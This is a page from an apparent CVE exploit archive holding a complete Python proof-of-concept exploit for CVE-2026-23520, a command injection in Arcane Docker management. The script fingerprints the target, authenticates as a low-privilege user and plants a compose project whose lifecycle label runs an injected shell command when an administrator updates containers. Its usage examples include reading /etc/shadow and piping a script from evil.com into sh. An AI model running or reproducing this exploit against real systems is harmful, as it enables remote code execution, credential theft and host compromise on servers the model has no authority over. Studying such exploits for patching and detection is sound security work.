5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / poc.py PY
#!/usr/bin/env python3
"""
╔══════════════════════════════════════════════════════════════════════════╗
║              CVE-2026-23520 — Proof of Concept (PoC)                   ║
║         Arcane Docker Management — Lifecycle Label RCE                 ║
╠══════════════════════════════════════════════════════════════════════════╣
║  Product  : Arcane (Modern Docker Management)                          ║
║  Version  : < 1.13.0                                                   ║
║  Type     : OS Command Injection (CWE-78)                              ║
║  CVSS 3.1 : 9.0 (Critical) — AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H    ║
║  Advisory : GHSA-gjqq-6r35-w3r8                                       ║
║  Fix      : Upgrade to >= 1.13.0                                       ║
║  Author   : Security Research / Educational Use Only                   ║
╠══════════════════════════════════════════════════════════════════════════╣
║  DISCLAIMER: This tool is provided for AUTHORIZED security testing     ║
║  and educational purposes ONLY. Unauthorized access to computer        ║
║  systems is illegal. Use responsibly and only against systems you      ║
║  own or have explicit written permission to test.                      ║
╚══════════════════════════════════════════════════════════════════════════╝

VULNERABILITY SUMMARY
─────────────────────
Arcane's updater service supports Docker container lifecycle labels:
  • com.getarcaneapp.arcane.lifecycle.pre-update
  • com.getarcaneapp.arcane.lifecycle.post-update

The value of these labels is passed DIRECTLY to `/bin/sh -c` without
any sanitization or validation.

Any authenticated user (not limited to admins) can create a project
via the Arcane API with a docker-compose definition containing a
malicious lifecycle label. When an administrator later triggers a
container update, the injected command executes inside the container
(and potentially on the host if volume mounts are present).

ATTACK FLOW
───────────
  1. Attacker authenticates as a low-privilege user
  2. Attacker creates a project with a poisoned compose file
     containing a lifecycle label with an injected shell command
  3. An administrator triggers a container update (manual or scheduled)
  4. Arcane's updater reads the label and executes it via /bin/sh -c
  5. Arbitrary command execution is achieved
"""

import argparse
import json
import re
import sys
import textwrap
import time
import urllib.request
import urllib.error
import urllib.parse
import ssl

# ──────────────────────────────────────────────────────────────────────
# Configuration & Constants
# ──────────────────────────────────────────────────────────────────────

BANNER = r"""
   ╔═══════════════════════════════════════════════════════╗
   ║          CVE-2026-23520  PoC Exploit                  ║
   ║    Arcane < 1.13.0 — Lifecycle Label RCE              ║
   ╚═══════════════════════════════════════════════════════╝
"""

LIFECYCLE_LABEL_PRE  = "com.getarcaneapp.arcane.lifecycle.pre-update"
LIFECYCLE_LABEL_POST = "com.getarcaneapp.arcane.lifecycle.post-update"

DEFAULT_PORT    = 3552
DEFAULT_PAYLOAD = "id"  # Harmless proof command
PROJECT_NAME    = "poc-cve-2026-23520"

SEMVER_RE = re.compile(r"^v?\d+\.\d+\.\d+")

# All known version-related response keys (case-insensitive matching
# is done at extraction time, but we list the canonical forms here)
VERSION_KEYS = [
    "currentVersion", "current_version",
    "version", "Version",
    "serverVersion", "server_version",
    "appVersion", "app_version",
    "release", "tag", "tag_name",
]

# All known API paths the Arcane version endpoint might live at.
# Tried in order; first success wins.
VERSION_ENDPOINTS = [
    "/api/version",
    "/api/system/version",
    "/api/v1/version",
    "/api/settings/version",
    "/api/status",
    "/api/health",
    "/api/info",
]

# All known API paths for authentication
AUTH_ENDPOINTS = [
    "/api/auth/login",
    "/api/login",
    "/api/v1/auth/login",
    "/api/auth/signin",
    "/api/users/login",
]

# All known token keys in auth responses
TOKEN_KEYS = [
    "token", "accessToken", "access_token",
    "jwt", "session", "sessionToken", "session_token",
    "bearer", "auth_token", "authToken",
]

# All known API paths for environment listing
ENV_ENDPOINTS = [
    "/api/environments",
    "/api/v1/environments",
    "/api/endpoints",
    "/api/v1/endpoints",
]

# All known API path patterns for project creation.
# {env_id} will be replaced at runtime.
PROJECT_ENDPOINTS = [
    "/api/environments/{env_id}/projects",
    "/api/v1/environments/{env_id}/projects",
    "/api/projects",
    "/api/v1/projects",
    "/api/environments/{env_id}/compose",
    "/api/compose/projects",
]


# ──────────────────────────────────────────────────────────────────────
# Logging Helpers
# ──────────────────────────────────────────────────────────────────────

class Style:
    RED    = "\033[91m"
    GREEN  = "\033[92m"
    YELLOW = "\033[93m"
    CYAN   = "\033[96m"
    BOLD   = "\033[1m"
    DIM    = "\033[2m"
    RESET  = "\033[0m"


def info(msg):
    print(f"  {Style.CYAN}[*]{Style.RESET} {msg}")

def success(msg):
    print(f"  {Style.GREEN}[+]{Style.RESET} {msg}")

def warning(msg):
    print(f"  {Style.YELLOW}[!]{Style.RESET} {msg}")

def error(msg):
    print(f"  {Style.RED}[-]{Style.RESET} {msg}")

def debug(msg):
    print(f"  {Style.DIM}[~] {msg}{Style.RESET}")

def section(title):
    print(f"\n  {Style.BOLD}{Style.CYAN}── {title} ──{Style.RESET}")


# ──────────────────────────────────────────────────────────────────────
# Response Helpers — extract values from unpredictable JSON shapes
# ──────────────────────────────────────────────────────────────────────

def _extract_value(data: dict, candidates: list) -> str | None:
    """Try each candidate key against `data`, case-insensitively.

    Also performs a one-level-deep nested search so structures like
    {"data": {"version": "1.12.0"}} are handled.
    """
    if not isinstance(data, dict):
        return None

    # Build a lowercase lookup of the response
    lower_map = {k.lower(): v for k, v in data.items()}

    for key in candidates:
        # Direct hit (exact case)
        val = data.get(key)
        if val and isinstance(val, str):
            return val
        # Case-insensitive hit
        val = lower_map.get(key.lower())
        if val and isinstance(val, str):
            return val

    # One-level-deep: check nested dicts
    for v in data.values():
        if isinstance(v, dict):
            nested_lower = {k.lower(): val for k, val in v.items()}
            for key in candidates:
                val = v.get(key)
                if val and isinstance(val, str):
                    return val
                val = nested_lower.get(key.lower())
                if val and isinstance(val, str):
                    return val

    return None


def _extract_list(data, candidates: list | None = None) -> list:
    """Return a list from the response, regardless of wrapper shape."""
    if isinstance(data, list):
        return data
    if isinstance(data, dict):
        # Try known keys first
        if candidates:
            for key in candidates:
                val = data.get(key)
                if isinstance(val, list):
                    return val
        # Fallback: return the first list-valued field
        for v in data.values():
            if isinstance(v, list):
                return v
    return []


def _scan_for_semver(data: dict, depth: int = 2) -> str | None:
    """Recursively scan a dict for any value matching vX.Y.Z."""
    for v in data.values():
        if isinstance(v, str) and SEMVER_RE.match(v):
            return v
        if isinstance(v, dict) and depth > 0:
            hit = _scan_for_semver(v, depth - 1)
            if hit:
                return hit
    return None


# ──────────────────────────────────────────────────────────────────────
# HTTP Client — resilient, quiet probing, adaptive parsing
# ──────────────────────────────────────────────────────────────────────

class ArcaneClient:
    """Minimal HTTP client for the Arcane REST API.

    Designed for resilience:
      • `quiet=True` suppresses error output (used during probing)
      • Multi-endpoint probing helpers try paths in order
      • Response parsing uses fuzzy key matching
    """

    def __init__(self, base_url: str, verify_ssl: bool = True,
                 verbose: bool = False):
        self.base_url = base_url.rstrip("/")
        self.token = None
        self.verbose = verbose
        self.ctx = ssl.create_default_context()
        if not verify_ssl:
            self.ctx.check_hostname = False
            self.ctx.verify_mode = ssl.CERT_NONE

    # ── low-level request ────────────────────────────────────────────

    def _request(self, method: str, path: str, data: dict = None,
                 quiet: bool = False) -> dict | None:
        """Send an HTTP request.  Returns parsed JSON or None on failure.

        When `quiet=True` errors are swallowed silently — this is used
        during endpoint probing so the user doesn't see 404 spam.
        """
        url = f"{self.base_url}{path}"
        headers = {"Content-Type": "application/json",
                   "Accept": "application/json"}
        if self.token:
            headers["Authorization"] = f"Bearer {self.token}"

        body = json.dumps(data).encode() if data else None
        req = urllib.request.Request(url, data=body, headers=headers,
                                    method=method)

        try:
            resp = urllib.request.urlopen(req, context=self.ctx, timeout=10)
        except urllib.error.HTTPError as exc:
            if not quiet:
                resp_body = exc.read().decode(errors="replace")
                error(f"HTTP {exc.code} — {exc.reason}")
                error(f"  Body: {resp_body[:500]}")
            return None
        except (urllib.error.URLError, OSError, TimeoutError) as exc:
            if not quiet:
                error(f"Connection failed: {exc}")
            return None

        raw = resp.read().decode(errors="replace")
        if not raw:
            return {}
        try:
            return json.loads(raw)
        except json.JSONDecodeError:
            return {"raw": raw}

    # ── convenience wrappers ─────────────────────────────────────────

    def get(self, path, **kw):
        return self._request("GET", path, **kw)

    def post(self, path, data=None, **kw):
        return self._request("POST", path, data=data, **kw)

    def put(self, path, data=None, **kw):
        return self._request("PUT", path, data=data, **kw)

    def delete(self, path, **kw):
        return self._request("DELETE", path, **kw)

    # ── version fingerprinting (resilient) ───────────────────────────

    def get_version(self) -> str | None:
        """Probe multiple endpoints and key names to find the version.

        Tries every combination of VERSION_ENDPOINTS × VERSION_KEYS
        and returns the first version string found.
        """
        info("Probing version endpoints …")
        for ep in VERSION_ENDPOINTS:
            if self.verbose:
                debug(f"Trying {ep}")

            resp = self.get(ep, quiet=True)
            if resp is None:
                continue

            if self.verbose:
                debug(f"Got response from {ep}: {json.dumps(resp)[:200]}")

            # Try all known key names (with case-insensitive + nested)
            ver = _extract_value(resp, VERSION_KEYS)
            if ver:
                success(f"Found version via {Style.DIM}{ep}{Style.RESET}")
                return ver

            # Last resort: scan every string value that looks like a
            # semver (vX.Y.Z or X.Y.Z)
            ver = _scan_for_semver(resp)
            if ver:
                success(f"Inferred version from {Style.DIM}{ep}{Style.RESET}")
                return ver

        return None

    # ── authentication (resilient) ───────────────────────────────────

    def login(self, username: str, password: str) -> bool:
        """Authenticate to Arcane by trying multiple auth endpoints
        and token key names."""
        info(f"Authenticating as {Style.BOLD}{username}{Style.RESET} …")

        creds_variants = [
            {"username": username, "password": password},
            {"email": username, "password": password},
            {"Username": username, "Password": password},
            {"user": username, "pass": password},
        ]

        for ep in AUTH_ENDPOINTS:
            for creds in creds_variants:
                if self.verbose:
                    debug(f"Trying {ep} with keys {list(creds.keys())}")

                resp = self.post(ep, data=creds, quiet=True)
                if resp is None:
                    continue

                if self.verbose:
                    # Redact the actual token value in debug output
                    debug(f"Got response from {ep}: keys={list(resp.keys())}")

                # Try known token keys
                tok = _extract_value(resp, TOKEN_KEYS)
                if tok and len(tok) > 20:
                    self.token = tok
                    success(f"JWT obtained via {Style.DIM}{ep}{Style.RESET}")
                    return True

                # Heuristic: any long string value with dots might be a JWT
                for val in resp.values():
                    if isinstance(val, str) and len(val) > 40 and "." in val:
                        self.token = val
                        success(f"JWT obtained via {Style.DIM}{ep}{Style.RESET} "
                                f"(heuristic)")
                        return True

        error("Authentication failed on all known endpoints")
        return False

    # ── environment discovery (resilient) ────────────────────────────

    def get_environments(self) -> list:
        """List available environments by probing multiple paths."""
        info("Probing environment endpoints …")
        for ep in ENV_ENDPOINTS:
            if self.verbose:
                debug(f"Trying {ep}")

            resp = self.get(ep, quiet=True)
            if resp is None:
                continue

            envs = _extract_list(resp, [
                "environments", "Environments",
                "endpoints", "Endpoints",
                "data", "results", "items",
            ])
            if envs:
                success(f"Found {len(envs)} environment(s) via "
                        f"{Style.DIM}{ep}{Style.RESET}")
                return envs

            # If the response itself is a dict with an "id", treat it
            # as a single-environment response
            if isinstance(resp, dict) and ("id" in resp or "Id" in resp):
                return [resp]

        return []

    # ── project creation (resilient) ─────────────────────────────────

    def create_poisoned_project(self, env_id: str, project_name: str,
                                payload: str,
                                hook: str = "pre") -> dict | None:
        """Create a new project with a poisoned lifecycle label.

        Tries multiple API path patterns and compose field names.
        """
        label_key = (LIFECYCLE_LABEL_PRE if hook == "pre"
                     else LIFECYCLE_LABEL_POST)

        compose_content = textwrap.dedent(f"""\
            services:
              {project_name}:
                image: alpine:latest
                container_name: {project_name}
                restart: unless-stopped
                command: ["sleep", "infinity"]
                labels:
                  - "{label_key}={payload}"
        """)

        info(f"Injecting payload into lifecycle label: "
             f"{Style.BOLD}{hook}-update{Style.RESET}")
        info(f"Label : {Style.DIM}{label_key}{Style.RESET}")
        info(f"Value : {Style.RED}{payload}{Style.RESET}")

        # Build a list of request bodies with different field names
        # that various Arcane versions might expect
        body_variants = [
            {"name": project_name, "composeContent": compose_content},
            {"name": project_name, "compose_content": compose_content},
            {"name": project_name, "content": compose_content},
            {"name": project_name, "compose": compose_content},
            {"Name": project_name, "ComposeContent": compose_content},
            {"projectName": project_name, "composeFile": compose_content},
        ]

        # Build the endpoint list, filling in env_id
        endpoints = [ep.format(env_id=env_id) for ep in PROJECT_ENDPOINTS]

        for ep in endpoints:
            for body in body_variants:
                if self.verbose:
                    debug(f"Trying POST {ep} with keys {list(body.keys())}")

                resp = self.post(ep, data=body, quiet=True)
                if resp is None:
                    continue
                # Any non-None response that isn't an explicit error
                if isinstance(resp, dict) and resp.get("error"):
                    if self.verbose:
                        debug(f"Error response: {resp.get('error')}")
                    continue
                success(f"Project created via "
                        f"{Style.DIM}{ep}{Style.RESET}")
                return resp

        error("Failed to create project on all known endpoints")
        return None


# ──────────────────────────────────────────────────────────────────────
# Version Parsing Utility
# ──────────────────────────────────────────────────────────────────────

def parse_version(version_str: str) -> tuple | None:
    """Parse 'v1.12.4' or '1.12.4' into (1, 12, 4).  Returns None on
    failure."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version_str)
    if m:
        return int(m.group(1)), int(m.group(2)), int(m.group(3))
    return None


def is_vulnerable(version_str: str) -> bool | None:
    """Return True if vulnerable, False if patched, None if unknown."""
    parsed = parse_version(version_str)
    if parsed is None:
        return None
    major, minor, _patch = parsed
    return (major, minor) < (1, 13)


# ──────────────────────────────────────────────────────────────────────
# Main Exploit Logic
# ──────────────────────────────────────────────────────────────────────

def run_exploit(args):
    """
    Orchestrates the full attack chain:
      1. Connect & fingerprint
      2. Authenticate
      3. Discover environment
      4. Plant poisoned project
    """
    print(BANNER)
    base_url = f"{args.scheme}://{args.target}:{args.port}"

    client = ArcaneClient(base_url, verify_ssl=(not args.no_verify),
                          verbose=args.verbose)

    # ── Step 1: Fingerprint ──────────────────────────────────────────
    section("Step 1 · Fingerprinting Target")
    info(f"Target: {base_url}")
    version = client.get_version()
    if version:
        success(f"Arcane version: {Style.BOLD}{version}{Style.RESET}")
        vuln = is_vulnerable(version)
        if vuln is True:
            success(f"Version {version} is < 1.13.0 — "
                    f"{Style.RED}VULNERABLE{Style.RESET}")
        elif vuln is False:
            warning(f"Version {version} is >= 1.13.0 — PATCHED")
            warning("Exploit will likely fail. Continue? (Ctrl-C to abort)")
            time.sleep(3)
        else:
            warning(f"Could not parse version string: {version}")
    else:
        warning("Could not determine version (continuing anyway)")

    # ── Step 2: Authenticate ─────────────────────────────────────────
    section("Step 2 · Authentication")
    if not client.login(args.username, args.password):
        error("Cannot proceed without authentication. Exiting.")
        sys.exit(1)

    # ── Step 3: Discover environment ─────────────────────────────────
    section("Step 3 · Environment Discovery")
    env_id = args.env_id

    if not env_id:
        envs = client.get_environments()
        if not envs:
            error("No environments found. Specify one with --env-id.")
            sys.exit(1)
        for e in envs:
            eid = (_extract_value(e, ["id", "Id", "ID", "uuid", "UUID"])
                   or "?")
            ename = (_extract_value(e, ["name", "Name", "label", "Label"])
                     or "unknown")
            info(f"  → {eid}  ({ename})")
        first = envs[0]
        env_id = str(
            _extract_value(first, ["id", "Id", "ID", "uuid", "UUID"])
            or "1"
        )
        success(f"Using environment: {Style.BOLD}{env_id}{Style.RESET}")
    else:
        info(f"Using provided environment ID: {env_id}")

    # ── Step 4: Plant poisoned project ───────────────────────────────
    section("Step 4 · Planting Poisoned Project")
    result = client.create_poisoned_project(
        env_id=env_id,
        project_name=args.project_name,
        payload=args.payload,
        hook=args.hook,
    )

    if result:
        section("Exploit Planted Successfully")
        success("The poisoned project is now waiting for an update trigger.")
        print()
        info("When an administrator triggers a container update (manual")
        info("or scheduled), the payload will execute inside the container")
        info("via /bin/sh -c with the value of the lifecycle label.")
        print()
        warning("If the container has host volume mounts, the payload")
        warning("may be able to read/write the host filesystem.")
        print()

        print(f"  {Style.DIM}{'─' * 56}{Style.RESET}")
        print(f"  {Style.BOLD}Payload{Style.RESET}: {Style.RED}{args.payload}{Style.RESET}")
        print(f"  {Style.BOLD}Hook   {Style.RESET}: {args.hook}-update")
        print(f"  {Style.BOLD}Project{Style.RESET}: {args.project_name}")
        print(f"  {Style.DIM}{'─' * 56}{Style.RESET}")
    else:
        error("Exploit deployment failed.")
        sys.exit(1)


# ──────────────────────────────────────────────────────────────────────
# Compose-File Generator (standalone / offline mode)
# ──────────────────────────────────────────────────────────────────────

def generate_compose(args):
    """Generate a poisoned docker-compose.yml to stdout (no network)."""
    print(BANNER)
    section("Generating Poisoned Compose File")

    label_key = (LIFECYCLE_LABEL_PRE if args.hook == "pre"
                 else LIFECYCLE_LABEL_POST)

    compose = textwrap.dedent(f"""\
        # ─────────────────────────────────────────────────────────
        # CVE-2026-23520 — Poisoned docker-compose.yml
        # Arcane < 1.13.0 Lifecycle Label Command Injection
        # ─────────────────────────────────────────────────────────
        # Import this file as a new project in Arcane.
        # When a container update is triggered, the payload fires.
        # ─────────────────────────────────────────────────────────

        services:
          {args.project_name}:
            image: alpine:latest
            container_name: {args.project_name}
            restart: unless-stopped
            command: ["sleep", "infinity"]
            labels:
              - "{label_key}={args.payload}"
    """)

    print(compose)
    success("Copy the above YAML into Arcane's 'Create Project' form.")
    info("When an update is triggered, the label value will execute as:")
    info(f"  /bin/sh -c '{args.payload}'")


# ──────────────────────────────────────────────────────────────────────
# Version Check Mode
# ──────────────────────────────────────────────────────────────────────

def check_version(args):
    """Fingerprint the target and report if it's vulnerable."""
    print(BANNER)
    base_url = f"{args.scheme}://{args.target}:{args.port}"
    client = ArcaneClient(base_url, verify_ssl=(not args.no_verify),
                          verbose=args.verbose)

    section("Version Check")
    info(f"Target: {base_url}")
    version = client.get_version()
    if version:
        success(f"Arcane version: {Style.BOLD}{version}{Style.RESET}")
        vuln = is_vulnerable(version)
        if vuln is True:
            error(f"VULNERABLE — version {version} < 1.13.0")
        elif vuln is False:
            success("PATCHED — not vulnerable to CVE-2026-23520")
        else:
            warning(f"Could not parse version: {version}")
    else:
        warning("Could not determine version. Target may still be vulnerable.")
        warning("Ensure the host and port are correct and the service is up.")


# ──────────────────────────────────────────────────────────────────────
# CLI Argument Parser
# ──────────────────────────────────────────────────────────────────────

def build_parser() -> argparse.ArgumentParser:
    parser = argparse.ArgumentParser(
        description="CVE-2026-23520 — Arcane Lifecycle Label RCE PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=textwrap.dedent("""\
        Examples
        ────────
          # Full exploit against a target
          %(prog)s exploit -t 192.168.1.10 -u attacker -p s3cret

          # Just check if the target is vulnerable
          %(prog)s check -t 192.168.1.10

          # Generate a poisoned compose file (offline)
          %(prog)s generate --payload "cat /etc/shadow > /tmp/loot"

          # Use post-update hook with custom payload
          %(prog)s exploit -t 10.0.0.5 -u user -p pass \\
              --hook post --payload "curl http://evil.com/shell.sh | sh"

          # Verbose probing to see which endpoints are tried
          %(prog)s check -t 10.0.0.5 --verbose
        """),
    )

    # Global flags
    parser.add_argument("-v", "--verbose", action="store_true",
        help="Show probing debug output")

    subparsers = parser.add_subparsers(dest="command", required=True)

    # ── exploit sub-command ───────────────────────────────────────────
    sp_exploit = subparsers.add_parser("exploit",
        help="Deploy the poisoned project via the Arcane API")
    sp_exploit.add_argument("-t", "--target", required=True,
        help="Arcane host (IP or hostname)")
    sp_exploit.add_argument("-P", "--port", type=int, default=DEFAULT_PORT,
        help=f"Arcane port (default: {DEFAULT_PORT})")
    sp_exploit.add_argument("-u", "--username", required=True,
        help="Arcane username (any authenticated user)")
    sp_exploit.add_argument("-p", "--password", required=True,
        help="Arcane password")
    sp_exploit.add_argument("--payload", default=DEFAULT_PAYLOAD,
        help=f"Command to inject (default: '{DEFAULT_PAYLOAD}')")
    sp_exploit.add_argument("--hook", choices=["pre", "post"], default="pre",
        help="Which lifecycle hook to poison (default: pre)")
    sp_exploit.add_argument("--project-name", default=PROJECT_NAME,
        help=f"Name for the poisoned project (default: {PROJECT_NAME})")
    sp_exploit.add_argument("--env-id",
        help="Environment ID (auto-detected if omitted)")
    sp_exploit.add_argument("--scheme", choices=["http", "https"],
        default="http", help="URL scheme (default: http)")
    sp_exploit.add_argument("--no-verify", action="store_true",
        help="Disable TLS certificate verification")

    # ── check sub-command ─────────────────────────────────────────────
    sp_check = subparsers.add_parser("check",
        help="Fingerprint Arcane and check if vulnerable")
    sp_check.add_argument("-t", "--target", required=True,
        help="Arcane host")
    sp_check.add_argument("-P", "--port", type=int, default=DEFAULT_PORT)
    sp_check.add_argument("--scheme", choices=["http", "https"],
        default="http")
    sp_check.add_argument("--no-verify", action="store_true")

    # ── generate sub-command ──────────────────────────────────────────
    sp_gen = subparsers.add_parser("generate",
        help="Generate a poisoned compose file (no network required)")
    sp_gen.add_argument("--payload", default=DEFAULT_PAYLOAD,
        help=f"Command to inject (default: '{DEFAULT_PAYLOAD}')")
    sp_gen.add_argument("--hook", choices=["pre", "post"], default="pre")
    sp_gen.add_argument("--project-name", default=PROJECT_NAME)

    return parser


# ──────────────────────────────────────────────────────────────────────
# Entry Point
# ──────────────────────────────────────────────────────────────────────

def main():
    parser = build_parser()
    args = parser.parse_args()

    # Propagate --verbose to subcommands that don't define it
    if not hasattr(args, "verbose"):
        args.verbose = False

    try:
        if args.command == "exploit":
            run_exploit(args)
        elif args.command == "check":
            check_version(args)
        elif args.command == "generate":
            generate_compose(args)
    except KeyboardInterrupt:
        print(f"\n  {Style.YELLOW}[!]{Style.RESET} Aborted by user.")
        sys.exit(130)
    except Exception as exc:
        error(f"Unhandled error: {exc}")
        sys.exit(1)


if __name__ == "__main__":
    main()